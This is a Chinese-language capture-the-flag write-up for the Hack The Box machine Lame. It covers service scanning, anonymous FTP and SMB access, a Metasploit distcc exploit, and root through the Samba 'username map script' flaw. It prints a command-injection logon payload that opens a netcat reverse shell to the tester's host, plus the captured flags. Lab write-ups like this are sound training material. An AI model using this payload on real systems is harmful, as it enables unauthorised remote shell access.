Lame Writeup
聲明
我只是個初學者。 Please correct me if I'm wrong.
這臺很lame。
靶機資訊(Machine Infromation)
| Machine | Description |
|---|---|
| Name | Lame |
| OS | Linux |
| Difficulty | Easy |
| Author | ch4p |
情蒐(Reconnaissance)
服務掃描(Services Scan)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-22 01:37 EST
Nmap scan report for 10.129.69.61
Host is up (0.29s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.19
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2024-02-22T01:38:12-05:00
|_clock-skew: mean: 2h30m11s, deviation: 3h32m10s, median: 9s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.13 seconds
從結果可知:
1. FTP可以anonymous登入
2. 沒有Web App,所以針對既有服務攻擊 -> 查版本有沒有CVE
FTP - Port 21
Anonymous login
雖然可以登入,但是什麼都沒有。
Terminal
┌──(xavier㉿kali)-[~/Documents/CTF/htb/lame]
└─$ ftp 10.129.69.61
Connected to 10.129.69.61.
220 (vsFTPd 2.3.4)
Name (10.129.69.61:xavier): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
SMB - Port 445
Anonymous login
也是可以登入,但是唯一可以讀寫得/tmp下什麼都沒有。
Terminal
┌──(xavier㉿kali)-[~/Documents/CTF/htb/lame]
└─$ crackmapexec smb 10.129.69.61 -u '' -p '' --shares
SMB 10.129.69.61 445 LAME [*] Unix (name:LAME) (domain:hackthebox.gr) (signing:False) (SMBv1:True)
SMB 10.129.69.61 445 LAME [+] hackthebox.gr\:
SMB 10.129.69.61 445 LAME [+] Enumerated shares
SMB 10.129.69.61 445 LAME Share Permissions Remark
SMB 10.129.69.61 445 LAME ----- ----------- ------
SMB 10.129.69.61 445 LAME print$ Printer Drivers
SMB 10.129.69.61 445 LAME tmp READ,WRITE oh noes!
SMB 10.129.69.61 445 LAME opt
SMB 10.129.69.61 445 LAME IPC$ IPC Service (lame server (Samba 3.0.20-Debian))
SMB 10.129.69.61 445 LAME ADMIN$ IPC Service (lame server (Samba 3.0.20-Debian))
Terminal
┌──(xavier㉿kali)-[~/Documents/CTF/htb/lame]
└─$ crackmapexec smb 10.129.69.61 -u '' -p '' -M spider_plus --only-files -o READ_ONLY=false
SMB 10.129.69.61 445 LAME [*] Unix (name:LAME) (domain:hackthebox.gr) (signing:False) (SMBv1:True)
SMB 10.129.69.61 445 LAME [+] hackthebox.gr\:
SPIDER_P... 10.129.69.61 445 LAME [*] Started spidering plus with option:
SPIDER_P... 10.129.69.61 445 LAME [*] DIR: ['print$']
SPIDER_P... 10.129.69.61 445 LAME [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.129.69.61 445 LAME [*] SIZE: 51200
SPIDER_P... 10.129.69.61 445 LAME [*] OUTPUT: /tmp/cme_spider_plus
┌──(xavier㉿kali)-[~/Documents/CTF/htb/lame]
└─$ batcat /tmp/cme_spider_plus/10.129.69.61.json
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ File: /tmp/cme_spider_plus/10.129.69.61.json
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ {
2 │ "tmp": {
3 │ ".X0-lock": {
4 │ "atime_epoch": "2024-02-22 01:34:29",
5 │ "ctime_epoch": "2024-02-22 01:34:29",
6 │ "mtime_epoch": "2024-02-22 01:34:29",
7 │ "size": "11 Bytes"
8 │ },
9 │ ".X11-unix/X0": {
10 │ "atime_epoch": "2024-02-22 01:34:30",
11 │ "ctime_epoch": "2024-02-22 01:34:29",
12 │ "mtime_epoch": "2024-02-22 01:34:29",
13 │ "size": "0 Bytes"
14 │ },
15 │ "5619.jsvc_up": {
16 │ "atime_epoch": "2024-02-22 01:35:17",
17 │ "ctime_epoch": "2024-02-22 01:35:17",
18 │ "mtime_epoch": "2024-02-22 01:35:17",
19 │ "size": "0 Bytes"
20 │ },
21 │ "vgauthsvclog.txt.0": {
22 │ "atime_epoch": "2024-02-22 01:33:59",
23 │ "ctime_epoch": "2024-02-22 01:33:59",
24 │ "mtime_epoch": "2024-02-22 01:34:00",
25 │ "size": "1.56 KB"
26 │ }
27 │ }
28 │ }
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────
CVE-2011-2523 - vsftpd 2.3.4 Backdoor
以kaliearchsploit查找找已知CVE:
Terminal
┌──(xavier㉿kali)-[~]
└─$ searchsploit vsftpd 2.3.4
-------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
-------------------------------------------------------------------- ---------------------------------
CVE內容
2011年的7月,來自官方網站的vsftpd執行檔被發現異常,該版本(2.3.4)被植入後門,導致任何使用者名稱結尾是笑臉:),都可以在port 6200取得shell。
但沒用,因為連不到6200,被防火牆擋了。怎麼知道的?待會說。
CVE-2004-2687 - DistCC Daemon - Command Execution
除了kaliearchsploit,你也可以直接用Metasploit直接戳distcc:
Terminal
┌──(xavier㉿kali)-[~/Documents/CTF/htb/lame]
└─$ msfconsole
msf6 > use exploit/unix/misc/distcc_exec
[*] No payload configured, defaulting to cmd/unix/reverse_bash
msf6 exploit(unix/misc/distcc_exec) > set RHOSTS 10.129.69.61
RHOSTS => 10.129.69.61
msf6 exploit(unix/misc/distcc_exec) > check
[+] 10.129.69.61:3632 - The target is vulnerable.
Exploit
結果也是有弱點的版本,可RCE1,取得user.txt。
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uname -a
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
…
cat /home/makis/user.txt
9b6248858e31130017045acc97e586c3
在這之後利用smb上傳binary,打算另建服務和打proxy,但都失敗,看了一下netstat、其他服務才發覺有防火牆。
本階段其他嘗試
開很多服務,但一開始都沒有掃到=>防火牆。
netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp 0 0 0.0.0.0:512 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:513 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:514 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:56485 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:47718 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:8009 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:1099 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:5900 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:47602 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:8787 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:8180 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:1524 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 10.129.69.61:53 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:54618 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 2048 10.129.69.61:44118 10.10.14.19:8787 ESTABLISHED on (0.48/0/0)
tcp6 0 0 :::2121 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::3632 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::53 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::22 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::5432 :::* LISTEN off (0.00/0/0)
tcp6 0 0 ::1:953 :::* LISTEN off (0.00/0/0)
SSH等字典檔攻擊就不詳列了。
CVE-2007-2447 - kaliamba "username map script" Command Execution
直接網搜:kaliamba smbd 3.0.20,就會在exploit-db找到Metasploit腳本,移至腳本最下方得知RCE方法與使用者帳號有關。
在登入的時候加上payload:
Terminal
┌──(xavier㉿kali)-[~/Documents/CTF/htb/lame]
└─$ smbclient //10.129.69.61/tmp -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> logon "/=`nohup nc -e /bin/bash 10.10.14.19 8787`"
Password:
session setup failed: NT_STATUS_IO_TIMEOUT
smb: \> SMBecho failed (NT_STATUS_HOST_UNREACHABLE). The connection is disconnected now
等reverse shell連來,就可以取得root:
Terminal
┌──(xavier㉿kali)-[~]
└─$ nc -lvnp 8787
listening on [any] 8787 ...
connect to [10.10.14.19] from (UNKNOWN) [10.129.69.61] 47408
id
uid=0(root) gid=0(root)
cat /root/root.txt
0321c9e1cf74f79997eb79644863a347
至於為什麼用nc而不使用bash的reverse shell?因為連不會來啊。可能是我打錯吧。
後記
Lame是HTB的第一台靶機,主要目的是讓練習濫用已知漏洞。
靶機OS版本很舊,應另有提權途徑。
Last update:
2024-12-23
Created:
2024-02-25